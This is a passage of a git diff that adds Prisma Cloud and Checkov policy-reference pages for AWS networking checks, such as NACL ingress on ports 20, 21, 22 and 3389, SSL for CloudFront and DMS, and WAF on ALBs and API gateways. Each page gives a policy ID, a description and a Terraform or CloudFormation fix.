a072bd68-25cd-4245-94e1-fffee0590a50 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml[CKV2_AWS_42] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies CloudFront web distributions which have a default SSL certificate to access CloudFront content. +It is a best practice to use custom SSL Certificate to access CloudFront content. +It gives you full control over the content data. +custom SSL certificates also allow your users to access your content by using an alternate domain name. +You can use a certificate stored in AWS Certificate Manager (ACM) or you can use a certificate stored in IAM. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_cloudfront_distribution" "pass_1" { + + origin { + domain_name = aws_s3_bucket.primary.bucket_regional_domain_name + origin_id = "primaryS3" + + s3_origin_config { + origin_access_identity = aws_cloudfront_origin_access_identity.default.cloudfront_access_identity_path + } + + } + + default_cache_behavior { + target_origin_id = "groupS3" + } + + + viewer_certificate { + acm_certificate_arn = "aaaaa" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc new file mode 100644 index 000000000..82ab4bb07 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc @@ -0,0 +1,69 @@ +== AWS Database Migration Service endpoint do not have SSL configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 447fc9ef-a871-4e4b-b34c-46d4aad81f51 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml[CKV2_AWS_49] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies Database Migration Service (DMS) endpoints that are not configured with SSL to encrypt connections for source and target endpoints. + +It is recommended to use SSL connection for source and target endpoints; enforcing SSL connections help protect against 'man in the middle' attacks by encrypting the data stream between endpoint connections. + +NOTE: Not all databases use SSL in the same way. + +An Amazon Redshift endpoint already uses an SSL connection and does not require an SSL connection set up by AWS DMS. +So there are some exclusions included in policy RQL to report only those endpoints which can be configured using DMS SSL feature. +For more details https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Security.html#CHAP_Security.SSL[see here.] + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_dms_endpoint" "pass_source_1" { + certificate_arn = "arn:aws:acm:us-east-1:123456789012:certificate/12345678-1234-1234-1234-123456789012" + database_name = "test" + endpoint_id = "test-dms-endpoint-tf" + endpoint_type = "source" + engine_name = "aurora" + extra_connection_attributes = "" + kms_key_arn = "arn:aws:kms:us-east-1:123456789012:key/12345678-1234-1234-1234-123456789012" + password = "test" + port = 3306 + server_name = "test" + ssl_mode = "require" + username = "test" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticache-security-groups-are-defined.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticache-security-groups-are-defined.adoc new file mode 100644 index 000000000..0edcbbbb0 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticache-security-groups-are-defined.adoc @@ -0,0 +1,54 @@ +== AWS Elasticache security groups are not defined + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d53320d-6dcb-4592-9025-9c17a28f13f2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py[CKV_AWS_196] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By ensuring that AWS Elasticache security groups are defined, you can help protect your clusters from unauthorized access and ensure that only authorized traffic is allowed to reach your clusters. +This can help prevent data breaches and other security incidents, and can also help ensure that your clusters are not overwhelmed by unwanted traffic. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_elasticache_security_group" "exists" { + name = "elasticache-security-group" + security_group_names = [aws_security_group.bar.name] +} + + +resource "aws_security_group" "bar" { + name = "security-group" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc new file mode 100644 index 000000000..2fa7ae35b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc @@ -0,0 +1,69 @@ +== AWS Elasticsearch uses the default security group + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 61467e80-d0cd-44e8-ae43-c7b4877f771e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py[CKV_AWS_248] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Using the default security group for your Elasticsearch clusters can leave your clusters vulnerable to unauthorized access and other security threats. +This is because the default security group has a number of inbound and outbound rules that allow traffic from any source, which can make it easier for attackers to gain access to your clusters. +By ensuring that AWS Elasticsearch does not use the default security group, you can help protect your clusters from unauthorized access and other security threats. +Instead, you should create custom security groups that are tailored to your specific security needs, and use those for your Elasticsearch clusters. +This can help you more effectively control access to your clusters and protect them from potential threats. + + +*Buildtime - Fix* + + + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_elasticsearch_domain" "pass" { + domain_name = "example" + elasticsearch_version = "7.10" + + cluster_config { + instance_type = "r4.large.elasticsearch" + } + + + vpc_options { + security_group_ids = ["sg_1234545"] + } + + + tags = { + Domain = "TestDomain" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elb-policy-uses-only-secure-protocols.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elb-policy-uses-only-secure-protocols.adoc new file mode 100644 index 000000000..463531bfc --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elb-policy-uses-only-secure-protocols.adoc @@ -0,0 +1,55 @@ +== AWS ELB Policy uses some unsecure protocols + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b5c7b4ba-ca27-46a0-904e-ba0190361498 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py[CKV_AWS_213] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By ensuring that your AWS ELB policy only uses secure protocols, you can help prevent attackers from intercepting and reading sensitive information that is transmitted between your ELB and its clients. +This can help protect your network and data from various types of attacks, including man-in-the-middle attacks, eavesdropping, and other types of data interception. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_load_balancer_policy" "pass" { + load_balancer_name = aws_elb.wu-tang.name + policy_name = "wu-tang-ssl" + policy_type_name = "SSLNegotiationPolicyType" + + policy_attribute { + name = "Protocol-TLSv1.2" + value = "true" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc new file mode 100644 index 000000000..779293766 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 20 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a4a20fce-f0a1-4d0a-abee-3330c572f77c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py[CKV_AWS_230] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 20. +Removing unfettered connectivity to remote console services, such as FTP, reduces a server's exposure to risk. + +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 20 + To: 20", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 20 + to_port = 20 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc new file mode 100644 index 000000000..6e88004fb --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 21 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6aee688e-e769-41f9-aed0-cb2ae972c31c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py[CKV_AWS_229] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 21. +Removing unfettered connectivity to remote console services, such as FTP, reduces a server's exposure to risk. + +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 21 + To: 21", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 21 + to_port = 21 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc new file mode 100644 index 000000000..241a810bd --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 22 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a38287d8-f7b2-4d14-a06f-f4ef2467f472 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py[CKV_AWS_232] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 22. +Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk. + +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 22 + To: 22", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 22 + to_port = 22 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc new file mode 100644 index 000000000..3c5509c16 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc @@ -0,0 +1,86 @@ +== AWS NACL allows ingress from 0.0.0.0/0 to port 3389 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 207dd5fe-304c-4ee5-b238-3becd4f395c0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py[CKV_AWS_231] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Network Access Control List (NACL) is stateless and provides filtering of ingress/egress network traffic to AWS resources. +We recommend that NACLs do not allow unrestricted ingress access to port 3389. +Removing unfettered connectivity to remote console services, such as RDP, reduces a server's exposure to risk. + +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +{ + "Resources: + InboundRule: + Type: AWS::EC2::NetworkAclEntry + Properties: + NetworkAclId: + Ref: MyNACL + RuleNumber: 200 + Protocol: 6 + RuleAction: allow +- CidrBlock: 0.0.0.0/0 ++ CidrBlock: 10.0.0.0/32 + PortRange: + From: 3389 + To: 3389", +} +---- + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_network_acl_rule" "example" { + network_acl_id = aws_network_acl.example.id + rule_number = 200 + egress = false + protocol = "tcp" + rule_action = "allow" +- cidr_block = "0.0.0.0/0" ++ cidr_block = "10.0.0.0/32" + from_port = 3389 + to_port = 3389 +}", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc new file mode 100644 index 000000000..e10044ffe --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc @@ -0,0 +1,64 @@ +== AWS NAT Gateways are not utilized for the default route + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 954e9b67-ef6b-4bd4-9a6b-8fee29635057 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml[CKV2_AWS_35] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Using Amazon NAT Gateways (AWS NAT Gateways) for the default route can help improve the security and performance of your network. +NAT Gateways allow you to route traffic from your Amazon Virtual Private Cloud (Amazon VPC) to the Internet, while also hiding the IP addresses of your instances from the Internet. +This can help protect your instances from potential threats such as spoofing attacks and port scans. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_vpc" "example" { + cidr_block = "10.0.0.0/16" +} + + +resource "aws_internet_gateway" "example" { + vpc_id = aws_vpc.example.id +} + + +resource "aws_route_table" "aws_route_table_ok_1" { + vpc_id = aws_vpc.example.id + + route { + cidr_block = "0.0.0.0/0" + gateway_id = aws_internet_gateway.example.id + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-rds-security-groups-are-defined.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-rds-security-groups-are-defined.adoc new file mode 100644 index 000000000..91490763d --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-rds-security-groups-are-defined.adoc @@ -0,0 +1,54 @@ +== AWS RDS security groups are not defined + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 39e0a984-0fea-485f-96f3-b43d23f7c9c9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py[CKV_AWS_198] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By ensuring that AWS RDS security groups are defined, you can help protect your instances from unauthorized access and ensure that only authorized traffic is allowed to reach your instances. +This can help prevent data breaches and other security incidents, and can also help ensure that your instances are not overwhelmed by unwanted traffic. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_db_security_group" "exists" { + name = "rds_sg" + + ingress { + cidr = "10.0.0.0/24" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc new file mode 100644 index 000000000..fd864002e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc @@ -0,0 +1,54 @@ +== AWS route table with VPC peering overly permissive to all traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8d403b9b-794b-4516-84fa-e9415155fb27 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml[CKV2_AWS_44 ] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies VPC route tables with VPC peering connection which are overly permissive to all traffic. +Being highly selective in peering routing tables is a very effective way of minimizing the impact of breach as resources outside of these routes are inaccessible to the peered VPC. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_route" "aws_route_pass_1" { + route_table_id = "rtb-4fbb3ac4" + destination_cidr_block = "10.0.1.0/22" + vpc_peering_connection_id = "pcx-45ff3dc1" +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc new file mode 100644 index 000000000..fbd30b5ec --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc @@ -0,0 +1,72 @@ +== AWS Security Group allows all traffic on all ports + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10b368a7-3def-41cb-9114-39354b7674ae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py[CKV_AWS_277] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By allowing all ingress traffic on all ports, AWS security group permits unrestricted internet access. +Make sure that ports are defined properly + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_security_group" "pass" { + name = "example" + vpc_id = "aws_vpc.example.id" + + ingress { + cidr_blocks = ["0.0.0.0/0"] + from_port = 80 + to_port = 80 + protocol = "tcp" + } + + ingress { + cidr_blocks = ["0.0.0.0/0"] + from_port = 443 + to_port = 443 + protocol = "tcp" + } + + egress { + cidr_blocks = ["0.0.0.0/0"] + from_port = 0 + to_port = 0 + protocol = "-1" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc new file mode 100644 index 000000000..8b3f7cabf --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc @@ -0,0 +1,69 @@ +== AWS security groups allow ingress from 0.0.0.0/0 to port 80 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f4d22869-f19a-4a8c-86c8-eaeb0d9e1056 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py[CKV_AWS_260] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + + +Allowing ingress from 0.0.0.0/0 to port 80 (i.e. +the HTTP port) can expose your Amazon Web Services (AWS) resources to potential security threats. +This is because 0.0.0.0/0 represents all IP addresses, and allowing traffic from all IP addresses to port 80 can make it easier for attackers to access your resources. +By ensuring that your AWS security groups do not allow ingress from 0.0.0.0/0 to port 80, you can help protect your resources from potential attacks and unauthorized access. +Instead, you should specify the IP addresses or ranges of IP addresses that are allowed to access your resources, and only allow traffic from those sources. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_security_group" "bar-sg" { + name = "sg-bar" + vpc_id = aws_vpc.main.id + ingress { + from_port = 80 + to_port = 80 + protocol = "tcp" + security_groups = [aws_security_group.foo-sg.id] + description = "foo" + } + + egress { + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + } + +}", +} +---- +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-no-default-vpc-is-planned-to-be-provisioned.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-no-default-vpc-is-planned-to-be-provisioned.adoc new file mode 100644 index 000000000..5dc3faa23 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-no-default-vpc-is-planned-to-be-provisioned.adoc @@ -0,0 +1,55 @@ +== Default VPC is planned to be provisioned + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 85866910-4a92-4a99-b71c-fd309a49b3de + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py[CKV_AWS_148] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A default VPC is a VPC that is created for your AWS account when you create an AWS account. +It includes a default security group and a default network access control list (NACL). +Default VPCs have some limitations that might not be suitable for all use cases. +Therefore, if you have specific requirements for your VPC, such as custom IP address ranges, support for PrivateLink or Transit Gateway, or the ability to delete the VPC, it might be more appropriate to create a custom VPC instead of using the default VPC. + +=== Fix - Buildtime + + +*Terraform* + + +It is recommended for this resource to not be configured + + +[source,go] +---- +{ + " resource "aws_default_vpc" "default" { + tags = { + Name = "Default VPC" + } + + }", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-api-gateway-are-protected-by-waf.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-api-gateway-are-protected-by-waf.adoc new file mode 100644 index 000000000..820d99a79 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-api-gateway-are-protected-by-waf.adoc @@ -0,0 +1,70 @@ +== Public API gateway not configured with AWS Web Application Firewall v2 (AWS WAFv2) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fa2c54f0-629e-4913-8adf-c81092250789 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml[CKV2_AWS_29] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS WAF is a web application firewall service that helps protect your web applications and APIs from common web exploits that could affect your application's availability, integrity, or confidentiality. +By attaching AWS WAF to your public API gateway, you can create rules that block or allow traffic based on the characteristics of the traffic, such as the IP address, the HTTP method, or the values of specific headers. +This can help to protect your API from common web exploits such as SQL injection attacks, cross-site scripting attacks, and other types of malicious traffic. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_api_gateway_rest_api" "edge" { + name = var.name + + policy = "" + + endpoint_configuration { + types = ["EDGE"] + } + +} + +resource "aws_api_gateway_stage" "wafv2_edge" { + deployment_id = aws_api_gateway_deployment.example.id + rest_api_id = aws_api_gateway_rest_api.edge.id + stage_name = "example" +} + + +resource "aws_wafv2_web_acl_association" "edge" { + resource_arn = aws_api_gateway_stage.wafv2_edge.arn + web_acl_id = aws_wafv2_web_acl.foo.id +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf.adoc new file mode 100644 index 000000000..332e0e2a6 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf.adoc @@ -0,0 +1,59 @@ +== AWS Application Load Balancer (ALB) not configured with AWS Web Application Firewall v2 (AWS WAFv2) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7759063b-44f6-41ab-92fa-950f85f4a357 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml[CKV2_AWS_28] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS WAF is a web application firewall service that helps protect your web applications from common web exploits that could affect your application's availability, integrity, or confidentiality. +By attaching AWS WAF to your public-facing ALBs, you can create rules that block or allow traffic based on the characteristics of the traffic, such as the IP address, the HTTP method, or the values of specific headers. +This can help to protect your application from common web exploits such as SQL injection attacks, cross-site scripting attacks, and other types of malicious traffic. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_lb" "lb_good_1" { + internal= false +} + + + +resource "aws_wafregional_web_acl_association" "foo" { + resource_arn = aws_lb.lb_good_1.arn + web_acl_id = aws_wafregional_web_acl.foo.id +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc new file mode 100644 index 000000000..4cb1e15f3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc @@ -0,0 +1,67 @@ +== Redshift is deployed outside of a VPC + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9a75182d-ed78-4827-b94d-bdb8af35b5b7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py[CKV_AWS_154] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +A VPC is a virtual network in the AWS cloud that is isolated from other virtual networks. +When you deploy Redshift in a VPC, you can control the inbound and outbound network traffic to and from your Redshift cluster using security groups and network access control lists (NACLs). +This can help to improve the security of your Redshift cluster and protect it from unauthorized access or attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_cluster +* *Arguments:* cluster_subnet_group_name + + +[source,go] +---- +resource "aws_redshift_cluster" "pass" { + ... ++ cluster_subnet_group_name="subnet-ebd9cead" +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Redshift::Cluster +* *Arguments:* Properties.ClusterSubnetGroupName + + +[source,yaml] +---- +Type: "AWS::Redshift::Cluster" + Properties: + ... ++ ClusterSubnetGroupName: "subnet-ebd9cead" +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-drops-http-headers.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-drops-http-headers.adoc new file mode 100644 index 000000000..4cf25e0b7 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-drops-http-headers.adoc @@ -0,0 +1,56 @@ +== ALB does not drop HTTP headers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 